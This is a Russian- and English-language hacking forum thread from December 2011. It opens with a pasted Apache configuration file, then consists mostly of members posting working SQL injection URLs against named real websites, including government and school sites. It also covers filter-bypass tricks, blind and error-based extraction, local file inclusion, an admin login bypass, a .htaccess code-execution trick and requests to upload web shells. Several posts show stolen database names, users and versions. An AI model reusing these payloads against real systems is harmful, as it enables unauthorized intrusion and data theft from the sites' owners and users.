# `-- vhosts.d/ . . . . . . . . . . . . . . put your virtual host configuration (*.conf) here
# |-- vhost-ssl.template
# `-- vhost.template

### Global Environment ################################################## ####
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests.

# run under this user/group id
Include /etc/apache2/uid.conf

# - how many server processes to start (server pool regulation)
# - usage of KeepAlive
Include /etc/apache2/server-tuning.conf

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
ErrorLog /var/log/apache2/error_log

# generated from APACHE_MODULES in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/loadmodule.conf

# IP addresses / ports to listen on
Include /etc/apache2/listen.conf

# predefined logging formats
Include /etc/apache2/mod_log_config.conf

# generated from global settings in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/global.conf

# optional mod_status, mod_info
Include /etc/apache2/mod_status.conf
Include /etc/apache2/mod_info.conf

# optional cookie-based user tracking
# read the documentation before using it!!
Include /etc/apache2/mod_usertrack.conf

# configuration of server-generated directory listings
Include /etc/apache2/mod_autoindex-defaults.conf

# associate MIME types with filename extensions
TypesConfig /etc/apache2/mime.types
DefaultType text/plain
Include /etc/apache2/mod_mime-defaults.conf

# set up (customizable) error responses
Include /etc/apache2/errors.conf

# global (server-wide) SSL configuration, that is not specific to
# any virtual host
Include

# forbid access to the entire filesystem by default

Options Indexes
AllowOverride None
Order deny,allow
Deny from all

# use .htaccess files for overriding,
AccessFileName .htaccess
# and never show them

Order allow,deny
Deny from all

# List of resources to look for when the client requests a directory
DirectoryIndex index.html index.html.var

### 'Main' server configuration #############################################
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# definition. These values also provide defaults for
# any containers you may define later in the file.
#
# All of these directives may appear inside containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#
Include /etc/apache2/default-server.conf

# Another way to include your own files
#
# The file below is generated from /etc/sysconfig/apache2,
# include arbitrary files as named in APACHE_CONF_INCLUDE_FILES and
# APACHE_CONF_INCLUDE_DIRS
Include /etc/apache2/sysconfig.d/include.conf

### Virtual server configuration ############################################
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at
#
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.
#
Include /etc/apache2/vhosts.d/*.conf

# Note: instead of adding your own configuration here, consider
# adding it in your own file (/etc/apache2/httpd.conf.local)
# putting its name into APACHE_CONF_INCLUDE_FILES in
# /etc/sysconfig/apache2 -- this will make system updates
# easier :)

mailbrush
12.12.2011, 01:14
Include /etc/apache2/vhosts.d/*.conf


Как-бы намекает.

M_script
12.12.2011, 02:49
~EviL~ said:
Вот нашел уязвимость:

Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?


LFI, но похоже, что из директории не выпускает.

http://www.eash.eu/phpmyadmin/print.css- файл есть

http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет

Можно почитать файлы, к которым нет доступа через сайт:

http://www.eash.eu/openletter2011/index.php?file=.htaccess

Использовать для XSS:

http://www.eash.eu/openletter2011/index.php?file=

Или просто найти другой баг на сайте, как было написано выше =)


Code:
http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3 a,version(),user(),database()),9,10,11,12,13,14,15 ,16,17,18,19,20+--+

5.1.49-3:eash_live@localhost:eash_live

Кавычки не фильтруются и не экранируются

lightangel
12.12.2011, 04:04
Code:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+

Can't get vuln number?

Konqi
12.12.2011, 04:41
lightangel said:

Code:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+

Can't get vuln number?


http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+

lightangel
12.12.2011, 18:21
Is this site vulnerable?


Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0

Nothing yet works on it.

BigBear
12.12.2011, 21:45
lightangel said:
Is this site vulnerable?

Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0

Nothing yet works on it.


Yes. Its vulnerable


Code:
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)= 5 TRUE

_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)= 4 FALSE

lightangel
13.12.2011, 00:51
Thank you, I thought as much; Blind SQL Injection.

I'll have my take on it.

infoseller
13.12.2011, 09:55
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...

BigBear
13.12.2011, 13:40
infoseller said:
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...


Имхо это обычный заголовок, вставляемый в TITLE страницы. Ничего другого без указания линка на ум не идёт...

qaz
13.12.2011, 16:46
http://www.oz-gorod.ru/auto_ads.php?aid=3

вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?

Ereee
13.12.2011, 16:59
qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?


http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1

Ошибка исчезает. Сейчас через ошибку попробую.

--

BigBear, true. Blind =/

BigBear
13.12.2011, 17:01
qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?


Это Blind-SQL

Обрати внимание на текст под формой


Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 5 TRUE

http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 4 FASLE

User: us2864h@localhost

Database: db2864h

Version: 5.1.57

shadowrun
13.12.2011, 20:20
Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+

Konqi
13.12.2011, 20:26
shadowrun said:

Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+



http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+

http://www.kingston.k12.ok.us/admin/

обход авторизации в админке

login : admin' or '1'='1

pass: pass' or '1'='1

qaz
13.12.2011, 21:44
BigBear said:
Это Blind-SQL
Обрати внимание на текст под формой

Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 5 TRUE

http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 4 FASLE

User: us2864h@localhost

Database: db2864h

Version: 5.1.57



а вопрос насчот

and+substring((@@version),1,1)=5 TRUE

че ето за новый вид разкрютки? где я могу почитать мунал?

lightangel
14.12.2011, 04:19
Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39



Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?

+toxa+
14.12.2011, 04:44
qaz said:
а вопрос насчот
and+substring((@@version),1,1)=5 TRUE
че ето за новый вид разкрютки? где я могу почитать мунал?


ничго слошного ф разкрютке нетю особа.

ленк (http://tinyurl.com/2aemkg)

Ereee
14.12.2011, 06:13
lightangel said:

Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?




Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,1--+f

user():ozchrist_sope1@localhost

version():5.1.56

database():ozchrist_sope1


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+1--+f TRUE

I think, this is blind injection...

Boolean
14.12.2011, 10:40
Ereee said:

Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+1--+f TRUE

I think, this is blind injection...


лол. там не блинд.


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,us er%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+

При вытаскивании инфы из таблиц, обрамляйте в апострофы имя базы.


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom +%60information_schema%60.tables+--+

er9j6@
14.12.2011, 13:55
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?[/QUOTE]


http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317'+union+/*!select*/+1,2,3,4,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),6,7,8,9,10,11,12,13+--+

_Spamer_
14.12.2011, 22:14
http://pavlodarauto[antiG]ru/info/view.php?id=146

PRosTo_LEva
14.12.2011, 22:25
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146




http://pavlodarauto.ru/bd/baraholka_view.php?id=-1+/*!union+select*/+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21--


Плюсек мне

er9j6@
14.12.2011, 22:25
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146


так можно сделать


http://pavlodarauto.ru/info/view.php?id=-146+union+/*!select*/+1,2,3,4,5,6,/*!concat*/(version(),0x3a,database(),0x3a,user()),8,9,10+--+

Zer0-Set
15.12.2011, 13:03
Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .

qaz
15.12.2011, 19:24
d1v said:
это если юзер один.
а если юзеров > 1, то
File_Priv from mysql.user where user= 'юзер'


а как тут?


PHP:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.use r--+



выводит ошибку


PHP:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user=%27u198287@87%27--+



и так тоже ошибка

lansia1
15.12.2011, 19:53
Datax said:
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
http://storage9.static.itmages.ru/i/11/1215/h_1323955118_1765197_eb99d32068.png (http://itmages.ru/image/view/360563/eb99d320)
Раскручивайте дальше сами, я например вытаскивал все пароли и логины.



Как раскручивать такие скули?

Kasper1898
15.12.2011, 21:33
Подскажите

Ereee
15.12.2011, 21:34
Крути как обычно =/

http://site/login_login_groovy/1'+...

lansia1 чет не крутится.. Мб не скулья?

Kasper1898
15.12.2011, 21:36
Ereee

Спасибо,понял)

shadowrun
15.12.2011, 21:46
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+

er9j6@
15.12.2011, 22:40
shadowrun said:
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+


Это делается так


http://pressfortruth.ca/dvd_dtls.php?rid=1'+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),12,13,14,15+--+

shadowrun
15.12.2011, 22:45
er9j6@

Спасибо. Где можно получить подробности об этом способе?

stepashka_
16.12.2011, 00:00
shadowrun said:
er9j6@
Спасибо. Где можно получить подробности об этом способе?


Это просто обход фильтров /*! */ () и т.д.

dumpers_team
16.12.2011, 00:18
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'

Как просмотреть полный путь можно?

Osstudio
16.12.2011, 00:21
dumpers_team said:
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?


Скорее всего, дефолтные значения вроде index.php и т.п..

А вообще, чем тебе так мешает? хевидж не берёт?

Ещё отснифить можно...

lightangel
16.12.2011, 01:59
Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?counthit=1%27&newsid=10%27&from=search%27&cid=1%27&searchterm

Got this vuln, no where to start?

trololoman96
16.12.2011, 02:21
Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?newsid=-10'+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29/*

the site is vulnerable, then the most common sql


Скорее всего, дефолтные значения вроде index.php и т.п..
А вообще, чем тебе так мешает? хевидж не берёт?
Ещё отснифить можно...


интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?


Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?


Тебе остается только угадывать. Я не не разу не видел и не использовал sef, не знаю точно как он работает, качать исходники лень, но ссылки у джомлы однотипны, даже в плагинах почти всегда одни и теже параметры встречаются. Так что попробуй что то типа такого


Code:
/index.php?option=com_virtuemart&Itemid=97
/index.php?option=com_content&task=view&id=524&Itemid=271

может и повезет

lightangel
16.12.2011, 15:28
Thank you so much.

I have a String Based problem again.


Code:
http://motorcitydolls.net/partygal.php?id=-17

Not sure for a solution. Any help?

BigBear
16.12.2011, 19:09
lightangel said:
Thank you so much.
I have a String Based problem again.

Code:
http://motorcitydolls.net/partygal.php?id=-17

Not sure for a solution. Any help?


I think that its not vulnerable

meskaline
16.12.2011, 19:27
В редакторе в админке при добавлении вот такого кода сохраняется вот такая штука как обойти её?

system331
16.12.2011, 22:35
есть такой скрипт http://funny-shirt.ru/cat/110/page/1

если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.

но буквы режет, цыфры принимает, помогите раскрутить

er9j6@
16.12.2011, 22:40
system331 said:
есть такой скрипт http://funny-shirt.ru/cat/110/page/1
если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
но буквы режет, цыфры принимает, помогите раскрутить


это не скуля

_http://funny-shirt.ru/cat/110/page/1*1

_http://funny-shirt.ru/cat/110/page/1*2

Osstudio
16.12.2011, 22:53
интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?


Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес

M_script
16.12.2011, 23:23
Osstudio said:
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес


Где найти такой сниффер? (или отсыпь хотя бы то, что ты постоянно куришь)

IMMORTAL_S
17.12.2011, 00:07
Есть чтонить под

FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?

stepashka_
17.12.2011, 00:14
IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?


В паблике точно нету..

RFOPlayer
17.12.2011, 15:18
при запросе:


http://www.xxx.ru/showimg.php?id=-245+UNION+SELECT+1,2,3,4,5,6,7,8,9,file_priv+from+ mysql.user+where+user=0x6f626c61646d696e5f32--


выдается ошибка:


In module "/showimg.php" found error ="SELECT command denied to user 'u14678'@'10.8.0.28' for table 'user'" in query "select id_watch,title, fnameb, mex, korp, bras, glass, water, newe,opis from watch where id_watch=-245 UNION SELECT 1,2,3,4,5,6,7,8,9,file_priv from mysql.user where user=0x6f626c61646d696e5f32--"


что не так делаю?

+toxa+
17.12.2011, 15:30
IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?


пробовал? (http://www.exploit-db.com/exploits/18181/)


RFOPlayer said:
что не так делаю?


а у тебя просто прав имхо нет

shadowrun
17.12.2011, 17:32
www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+

Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...

er9j6@
17.12.2011, 18:07
shadowrun said:
www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+
Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...


Все крутится


http://www.finance.gov.tt/publications.php?mid=192+and+(select+1+from+(selec t+count(0),concat((select+version()),floor(rand(0) *2))+from+(select+1+union+select+2+union+select+3) x+group+by+2+limit+1)a)

lightangel
17.12.2011, 20:31
Why does vulnerable number not showing?


Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Konqi
17.12.2011, 20:34
lightangel said:
Why does vulnerable number not showing?

Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+

infoseller
17.12.2011, 23:11
Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA

Можно ли раскрутить? и как?

wkar
18.12.2011, 02:05
Привет,

есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?

Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.

ПС

Дайте ссылку на пхпмайадмина хостинга infobox.ru

Expl0ited
18.12.2011, 02:10
wkar said:
Привет,
есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?
Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.
ПС
Дайте ссылку на пхпмайадмина хостинга infobox.ru


скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс.

как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)

M_script
18.12.2011, 02:19
wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер?

У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif

wkar
18.12.2011, 02:21
как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)


Пробовал, не подключается, 61 ошибка.

ПС

хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую

2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.

Expl0ited
18.12.2011, 02:24
wkar said:
хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую


Так у тебя читалка или инклуд?

wkar
18.12.2011, 02:26
Expl0ited said:
Так у тебя читалка или инклуд?


в одно скрипте читалка, в другом инклуд.

M_script
18.12.2011, 02:27
http://help.infobox.ru/11-23


Также Вы можете воспользоваться утилитой PHPMyAdmin перейдя по ссылке http://mysql.infobox.ru


Но что то не открывается этот поддомен.

Expl0ited
18.12.2011, 02:28
wkar said:
в одно скрипте читалка, в другом инклуд.


Ну раз инклуд есть, то вариантов много, сессии, логи, временные файлы.

SecondLife
18.12.2011, 05:39
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.

Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.

Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.

faza02
18.12.2011, 05:42
Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?

Expl0ited
18.12.2011, 13:57
SecondLife said:
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.
Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.
Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.


http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

создаешь .htaccess с таким содержимым:


Code:

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess
#

и вызываешь так: site.com/.htaccess?e=phpinfo();


faza02 said:

Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?


нужно как минимум поставить одинарную кавычку:

SELECT * FROM db WHERE bd1 like '%' order by 100#'

KolosJey
18.12.2011, 16:34
infoseller said:

Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA

Можно ли раскрутить? и как?


Например так


Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1

faza02
18.12.2011, 17:28
Expl0ited, спасибо

запрос схавал, правда реакции нет

http://www.usvieda.org/search.php

уязвимо поле поиска.

Expl0ited
18.12.2011, 17:41
faza02 said:
Expl0ited
, спасибо
запрос схавал, правда реакции нет
http://www.usvieda.org/search.php
уязвимо поле поиска.


слоит 'and(select(max(1))from(information_schema.columns )group by(concat(version(),0x00,floor(rand(0)*2))))#

Breetonia
18.12.2011, 23:19
Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )

Expl0ited
18.12.2011, 23:29
SELECT * FROM `database`.`table.name`

Breetonia
18.12.2011, 23:30
хех,это замечательно,но в браузере такое не прокатит ведь.Я имел ввиду,что из браузера пытаюсь обратиться к скрипту таким образом,а не из phpMyAdmin или другого клиента.

Konqi
18.12.2011, 23:30
Breetonia said:
Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )



такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее

CREATE DATABASE `lo.l`;

возвращает "Incorrect database name"

Breetonia
18.12.2011, 23:32
Konqi said:
такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее


Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать.

Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...

Konqi
18.12.2011, 23:37
Breetonia said:
Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать.
Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...




Expl0ited said:
SELECT * FROM `database`.`table.name`



пробовал так? что отвечает браузер?

поидее должно сработать

Breetonia
18.12.2011, 23:40
Блин,ну я и лох...реально же сработал твой вариант (SELECT * FROM `database`.`table.name`).Спасибо огромное )).Я думал,что апострофы браузер не понимает,ведь так во многих манах пишут...

Вопрос остается открытым - как им удалось создать имя бд с точкой ?

ЗЫ: Сипт идёт лесом,т.к. не обрабатывает апострофы...

Konqi
18.12.2011, 23:51
Breetonia said:
Вопрос остается открытым - как им удалось создать имя бд с точкой ?


какая версия mysql?

Expl0ited
18.12.2011, 23:53
PHP:
CREATE DATABASE`kiss.me`;

CREATE TABLE`kiss.me`.`and_love.me` (

`its.ok`INT NOT NULL

)ENGINE=INNODB;



Это весьма забавно но:


PHP:
CREATE DATABASE`!@#$%^&*(` ;

CREATE TABLE`!@#$%^&*(`.`#$%^&*(` (

`)(*&^%$`INT NOT NULL

)ENGINE=INNODB;

работает вполне адекватно


PHP:
INSERT INTO`#$%^&*(`

VALUES(

'123'

);

SELECT`)(*&^%$`FROM`#$%^&*(`WHERE 1;

>>123

Konqi
18.12.2011, 23:55
Expl0ited said:

PHP:
CREATE DATABASE`kiss.me`;

CREATE TABLE`kiss.me`.`and_love.me` (

`its.ok`INT NOT NULL

)ENGINE=INNODB;





у меня не катит,

5.0.24а-community-nt

5.0.51a-24+lenny5


CREATE DATABASE `!@#$%^&*(` ;
CREATE TABLE `!@#$%^&*(`.`#$%^&*(` (
`)(*&^%$` INT NOT NULL
) ENGINE = INNODB;


тоже не катит

что у вас за базы?

версию в студию плз

Expl0ited
18.12.2011, 23:59
OK - version():5.5.8

NOT - mysql Ver 14.12 Distrib 5.0.92, for redhat-linux-gnu (x86_64) using readline 5.1

Konqi
19.12.2011, 00:05
ну все ясно, значит фича доступна начиная с версии 5.5 или как то так

ибо все пятые версии провалились

5.0.92-50-log

5.0.24а-community-nt

5.0.51a-24+lenny5

5.0.92

wkar
19.12.2011, 02:42
Здравствуйте, есть RFI (пример _http://www.regentbs.ru/index2.php?id=http://www-sbras.nsc.ru/win/mathpub/page-html ), но возможно инклюдить только .html .

Возможно ли залить шелл ?

M_script
19.12.2011, 02:53
wkar, file_get_contents - это не RFI. Можно только читать файлы.

qaz
19.12.2011, 16:22
Всем привет, подскажите почему не выводит нифига?


PHP:
http://festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28selec t+email+from+u1419187_alpha.jos_users+limit+1,1%29 ,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

qaz
19.12.2011, 16:39
Nightmarе said:
Твоя команда limit+1,1 выводит ВТОРОГО пользователя, а не первого, а в таблице он всего один.
Пруф:

Code:
http://festnevest.ru/photo_php.php?id=6+or+(@:=1)||@+group+by+concat((s elect+concat_ws(0x3A,username,0x3a,password,0x3a,u sertype)+from+u1419187_alpha.jos_users+limit+0,1), @:=@-1)having+@||min(@:=0)--+



ясно, спасибо

блин, немогу подобрать количество колонок


PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную

547
19.12.2011, 16:54
как сюда шелл залить?

http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;


qaz said:
ясно, спасибо
блин, немогу подобрать количество колонок

PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную


у тебя тут похоже эррор бейсед

Expl0ited
19.12.2011, 17:00
qaz said:
блин, немогу подобрать количество колонок

PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную




Code:
http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select (@x)from(select(@x:=0x00),(select(0)from(u13567_do y.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e, Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10 ,11,12,13,14--+



547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;


